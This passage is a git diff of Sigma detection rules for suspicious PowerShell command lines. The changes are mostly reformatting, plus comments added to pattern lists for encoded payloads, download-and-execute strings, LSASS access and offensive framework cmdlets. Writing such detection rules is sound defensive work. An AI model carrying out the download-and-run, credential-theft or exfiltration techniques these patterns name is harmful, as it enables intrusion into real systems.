8d01b53f-456f-48ee-90f6-bc28e67d4e35 status: test -description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell - code often used in command lines +description: Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines references: - https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/ author: Florian Roth (Nextron Systems) @@ -18,13 +17,18 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # -bxor 0x - IAAtAGIAeABvAHIAIAAwAHgA - AALQBiAHgAbwByACAAMAB4A - gAC0AYgB4AG8AcgAgADAAeA + # .Invoke() | - AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg - AuAEkAbgB2AG8AawBlACgAKQAgAHwAI - ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC + # {1}{0}" -f + # {0}{3}" -f + # {2}{0}" -f - AHsAMQB9AHsAMAB9ACIAIAAtAGYAI - B7ADEAfQB7ADAAfQAiACAALQBmAC - AewAxAH0AewAwAH0AIgAgAC0AZgAg @@ -34,6 +38,9 @@ detection: - AHsAMgB9AHsAMAB9ACIAIAAtAGYAI - B7ADIAfQB7ADAAfQAiACAALQBmAC - AewAyAH0AewAwAH0AIgAgAC0AZgAg + # {1}{0}' -f + # {0}{3}' -f + # {2}{0}' -f - AHsAMQB9AHsAMAB9ACcAIAAtAGYAI - B7ADEAfQB7ADAAfQAnACAALQBmAC - AewAxAH0AewAwAH0AJwAgAC0AZgAg diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml index 2b274e6a8..f4c6e9da1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml @@ -1,11 +1,10 @@ title: Potential Encoded PowerShell Patterns In CommandLine id: cdf05894-89e7-4ead-b2b0-0a5f97a90f2f related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: similar + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: similar status: test -description: Detects specific combinations of encoding methods in PowerShell via the - commandline +description: Detects specific combinations of encoding methods in PowerShell via the commandline references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton @@ -24,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_to_1: - CommandLine|contains: + CommandLine|contains: - ToInt - ToDecimal - ToByte @@ -39,20 +38,19 @@ detection: - ToSingle - ToSByte selection_to_2: - CommandLine|contains: + CommandLine|contains: - ToChar - ToString - String selection_gen_1: - CommandLine|contains|all: + CommandLine|contains|all: - char - join selection_gen_2: - CommandLine|contains|all: + CommandLine|contains|all: - split - join - condition: process_creation and (selection_img and (all of selection_to_* or 1 - of selection_gen_*)) + condition: process_creation and (selection_img and (all of selection_to_* or 1 of selection_gen_*)) falsepositives: - Unknown level: low diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml index e14972fb1..b1466940e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml @@ -17,18 +17,18 @@ detection: EventID: 4688 Channel: Security selection_exec: - CommandLine|contains: + CommandLine|contains: - 'iex ' - 'Invoke-Expression ' - 'Invoke-Command ' - 'icm ' selection_read: - CommandLine|contains: + CommandLine|contains: - 'cat ' - 'get-content ' - 'type ' selection_raw: - CommandLine|contains: ' -raw' + CommandLine|contains: ' -raw' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml index 036f67a13..babefa6be 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml @@ -1,12 +1,10 @@ title: Certificate Exported Via PowerShell id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb related: - - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c - type: similar + - id: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c + type: similar status: experimental -description: Detects calls to cmdlets that are used to export certificates from the - local certificate store. Threat actors were seen abusing this to steal private - keys from compromised machines. +description: Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a - https://docs.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate @@ -26,12 +24,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - 'Export-PfxCertificate ' - 'Export-Certificate ' condition: process_creation and selection falsepositives: - - Legitimate certificate exports by administrators. Additional filters might be - required. + - Legitimate certificate exports by administrators. Additional filters might be required. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml index 4c9806972..5472dd440 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml @@ -1,8 +1,7 @@ title: Base64 Encoded PowerShell Command Detected id: e32d4572-9826-4738-b651-95fa63747e8a status: test -description: Detects usage of the "FromBase64String" function in the commandline which - is used to decode a base64 encoded string +description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string references: - https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639 author: Florian Roth (Nextron Systems) @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: ::FromBase64String( + CommandLine|contains: ::FromBase64String( condition: process_creation and selection falsepositives: - Administrative script libraries diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml index 8d7ab4138..5f388f1ae 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml @@ -1,11 +1,10 @@ title: Suspicious FromBase64String Usage On Gzip Archive - Process Creation id: d75d6b6b-adb9-48f7-824b-ac2e786efe1f related: - - id: df69cb1d-b891-4cd9-90c7-d617d90100ce - type: similar + - id: df69cb1d-b891-4cd9-90c7-d617d90100ce + type: similar status: test -description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This - technique is often used as a method to load malicious content into memory afterward. +description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43 author: frack113 @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - FromBase64String - MemoryStream - H4sI diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml index af485cb86..3ca89ffdd 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml @@ -1,8 +1,8 @@ title: PowerShell Get-Clipboard Cmdlet Via CLI id: b9aeac14-2ffd-4ad3-b967-1354a4e628c3 related: - - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 - type: derived + - id: 4cbd4f12-2e22-43e3-882f-bff3247ffb78 + type: derived status: test description: Detects usage of the 'Get-Clipboard' cmdlet via CLI references: @@ -22,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: Get-Clipboard + CommandLine|contains: Get-Clipboard condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml index cbedc66ea..2c0bcd172 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml @@ -1,11 +1,10 @@ title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet id: c8a180d6-47a3-4345-a609-53f9c3d834fc related: - - id: cef24b90-dddc-4ae1-a09a-8764872f69fc - type: similar + - id: cef24b90-dddc-4ae1-a09a-8764872f69fc + type: similar status: test -description: Detects suspicious reconnaissance command line activity on Windows systems - using the PowerShell Get-LocalGroupMember Cmdlet +description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet references: - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ author: Nasreddine Bencherchali (Nextron Systems) @@ -17,21 +16,23 @@ logsource: category: process_creation product: windows detection: + # Covers group and localgroup flags process_creation: EventID: 4688 Channel: Security selection_cmdlet: - CommandLine|contains: 'Get-LocalGroupMember ' + CommandLine|contains: 'Get-LocalGroupMember ' selection_group: - CommandLine|contains: + CommandLine|contains: + # Add more groups for other languages - domain admins - - ' administrator' - - ' administrateur' + - ' administrator' # Typo without an 'S' so we catch both + - ' administrateur' # Typo without an 'S' so we catch both - enterprise admins - Exchange Trusted Subsystem - Remote Desktop Users - - "Utilisateurs du Bureau \xE0 distance" - - Usuarios de escritorio remoto + - Utilisateurs du Bureau à distance # French for "Remote Desktop Users" + - Usuarios de escritorio remoto # Spanish for "Remote Desktop Users" condition: process_creation and (all of selection_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml index 310f040f3..55f6d572e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml @@ -1,8 +1,7 @@ title: PowerShell Get-Process LSASS id: b2815d0d-7481-4bf0-9b6c-a4c48a94b349 status: test -description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which - is in almost all cases a sign of malicious activity +description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity references: - https://twitter.com/PythonResponder/status/1385064506049630211 author: Florian Roth (Nextron Systems) @@ -19,7 +18,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: + # You can add more permutation as you see fit - Get-Process lsas - ps lsas - gps lsas diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml index 3a596f738..b75167798 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml @@ -1,8 +1,7 @@ title: Malicious Base64 Encoded PowerShell Keywords in Command Lines id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0 status: test -description: Detects base64 encoded strings used in hidden malicious PowerShell command - lines +description: Detects base64 encoded strings used in hidden malicious PowerShell command lines references: - http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/ author: John Lambert (rule) @@ -19,16 +18,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_hidden: - CommandLine|contains: ' hidden ' + CommandLine|contains: ' hidden ' selection_encoded: - CommandLine|contains: + CommandLine|contains: - AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA - aXRzYWRtaW4gL3RyYW5zZmVy - IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml index bf96d4060..3471d3c54 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml @@ -1,14 +1,12 @@ title: Abuse of Service Permissions to Hide Services Via Set-Service id: 514e4c3a-c77d-4cde-a00f-046425e2301e related: - - id: a537cfc3-4297-4789-92b5-345bfd845ad0 - type: derived - - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da - type: similar + - id: a537cfc3-4297-4789-92b5-345bfd845ad0 + type: derived + - id: 953945c5-22fe-4a92-9f8a-a9edc1e522da + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 @@ -27,14 +25,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \pwsh.exe - - OriginalFileName: pwsh.dll + - NewProcessName|endswith: \pwsh.exe + - OriginalFileName: pwsh.dll selection_sddl: - CommandLine|contains|all: + # Example would be: "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" + CommandLine|contains|all: - 'Set-Service ' - DCLCWPDTSD selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - '-SecurityDescriptorSddl ' - '-sd ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml index 80ab07d4d..cb92a921c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection_combined_1: - CommandLine|contains: + CommandLine|contains: - ' | iex;' - ' | iex ' - ' | iex}' @@ -26,15 +26,15 @@ detection: - ' | IEX -Error' - ' | IEX (new' - ');IEX ' - NewProcessName|endswith: + NewProcessName|endswith: - \powershell.exe - \pwsh.exe selection_combined_2: - CommandLine|contains: + CommandLine|contains: - ::FromBase64String - '.GetString([System.Convert]::' selection_standalone: - CommandLine|contains: + CommandLine|contains: - )|iex;$ - );iex($ - );iex $ diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml index e32b27006..464763622 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml @@ -1,8 +1,7 @@ title: Root Certificate Installed From Susp Locations id: 5f6a601c-2ecb-498b-9c33-660362323afa status: test -description: Adversaries may install a root certificate on a compromised system to - avoid warnings when connecting to adversary controlled web servers. +description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps @@ -20,11 +19,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - Import-Certificate - ' -FilePath ' - Cert:\LocalMachine\Root - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - :\Windows\TEMP\ - \Desktop\ diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml index eba85fc99..bf7912eec 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml @@ -1,8 +1,8 @@ title: Import PowerShell Modules From Suspicious Directories - ProcCreation id: c31364f7-8be6-4b77-8483-dd2b5a7b69a3 related: - - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab - type: similar + - id: 21f9162c-5f5d-4b01-89a8-b705bd7d10ab + type: similar status: test description: Detects powershell scripts that import modules from suspicious directories references: @@ -20,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - Import-Module "$Env:Temp\ - Import-Module '$Env:Temp\ - Import-Module $Env:Temp\ @@ -28,6 +28,7 @@ detection: - Import-Module '$Env:Appdata\ - Import-Module $Env:Appdata\ - Import-Module C:\Users\Public\ + # Import-Module alias is "ipmo" - ipmo "$Env:Temp\ - ipmo '$Env:Temp\ - ipmo $Env:Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml index 93fcc1167..0b7b6ec4b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml @@ -1,11 +1,10 @@ title: Unsigned AppX Installation Attempt Using Add-AppxPackage id: 37651c2a-42cd-4a69-ae0d-22a4349aa04a related: - - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 - type: similar + - id: 975b2262-9a49-439d-92a6-0709cccdf0b2 + type: similar status: test -description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" - to install unsigned AppX packages +description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages references: - https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package - https://twitter.com/WindowsDocs/status/1620078135080325122 @@ -22,18 +21,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-AppPackage ' - 'Add-AppxPackage ' selection_flag: - CommandLine|contains: ' -AllowUnsigned' + CommandLine|contains: ' -AllowUnsigned' condition: process_creation and (all of selection_*) falsepositives: - Installation of unsigned packages for testing purposes diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml index fc5f5478d..b66a20753 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml @@ -1,12 +1,12 @@ title: Suspicious PowerShell Invocations - Specific - ProcessCreation id: 536e2947-3729-478c-9903-745aaffe60d2 related: - - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c - type: derived - - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 - type: similar - - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 - type: similar + - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c + type: derived + - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 + type: similar + - id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090 + type: similar status: test description: Detects suspicious PowerShell invocation command parameters author: Nasreddine Bencherchali (Nextron Systems) @@ -21,14 +21,14 @@ detection: EventID: 4688 Channel: Security selection_convert_b64: - CommandLine|contains|all: + CommandLine|contains|all: - -nop - ' -w ' - hidden - ' -c ' - '[Convert]::FromBase64String' selection_iex: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -noni @@ -37,20 +37,20 @@ detection: - iex - New-Object selection_enc: - CommandLine|contains|all: + CommandLine|contains|all: - ' -w ' - hidden - -ep - bypass - -Enc selection_reg: - CommandLine|contains|all: + CommandLine|contains|all: - powershell - reg - add - \software\ selection_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - bypass - -noprofile - -windowstyle @@ -59,13 +59,13 @@ detection: - system.net.webclient - .download selection_iex_webclient: - CommandLine|contains|all: + CommandLine|contains|all: - iex - New-Object - Net.WebClient - .Download filter_chocolatey: - CommandLine|contains: + CommandLine|contains: - (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1 - Write-ChocolateyWarning condition: process_creation and (1 of selection_* and not 1 of filter_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml index e897d4d3a..583c2e9c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml @@ -1,8 +1,7 @@ title: Suspicious Invoke-WebRequest Execution With DirectIP id: 1edff897-9146-48d2-9066-52e8d8f80a2f status: experimental -description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct - IP access +description: Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access references: - https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software author: Nasreddine Bencherchali (Nextron Systems) @@ -18,20 +17,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_ip: - CommandLine|contains: + # In case of FP with local IPs add additional filters + CommandLine|contains: - ://1 - ://2 - ://3 diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml index f48a91ba0..2e98d28bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml @@ -1,11 +1,10 @@ title: Suspicious Invoke-WebRequest Execution id: 5e3cc4d8-3e68-43db-8656-eaaeefdec9cc related: - - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 - type: derived + - id: e218595b-bbe7-4ee5-8a96-f32a24ad3468 + type: derived status: experimental -description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output - is located in a suspicious location +description: Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,24 +21,25 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_commands: - CommandLine|contains: + CommandLine|contains: + # These are all aliases of Invoke-WebRequest - 'curl ' - Invoke-WebRequest - 'iwr ' - 'wget ' selection_flags: - CommandLine|contains: + CommandLine|contains: - ' -ur' - ' -o' selection_susp_locations: - CommandLine|contains: + CommandLine|contains: - \AppData\ - \Desktop\ - \Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml index e7e133711..f33f47c05 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml @@ -1,8 +1,7 @@ title: Suspicious PowerShell Mailbox Export to Share id: 889719ef-dd62-43df-86c3-768fb08dc7c0 status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-MailboxExportRequest - ' -Mailbox ' - ' -FilePath \\\\' diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml index 757c85d60..48a48d0d9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml +++ b/sigma/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml @@ -1,10 +1,10 @@ title: Malicious PowerShell Commandlets - ProcessCreation id: 02030f2f-6199-49ec-b258-ea71b07e03dc related: - - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - type: derived - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar + - id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + type: derived + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar status: experimental description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: @@ -14,9 +14,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -48,7 +48,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + # Note: Please ensure alphabetical order when adding new entries + CommandLine|contains: - Add-Exfiltration - Add-Persistence - Add-RegBackdoor @@ -73,7 +74,7 @@ detection: - Find-Fruit - Find-GPOLocation - Find-TrustedDocuments - - Get-ADIDNS + - Get-ADIDNS # Covers: Get-ADIDNSNodeAttribute, Get-ADIDNSNodeOwner, Get-ADIDNSNodeTombstoned, Get-ADIDNSPermission, Get-ADIDNSZone - Get-ApplicationHost - Get-ChromeDump - Get-ClipboardContents @@ -142,7 +143,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -166,7 +167,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -185,7 +186,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -231,7 +232,7 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Set-MacAttribute - Set-MachineAccountAttribute - Set-Wallpaper diff --git a/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml b/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml index e46b450bd..ae3ae185d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml +++ 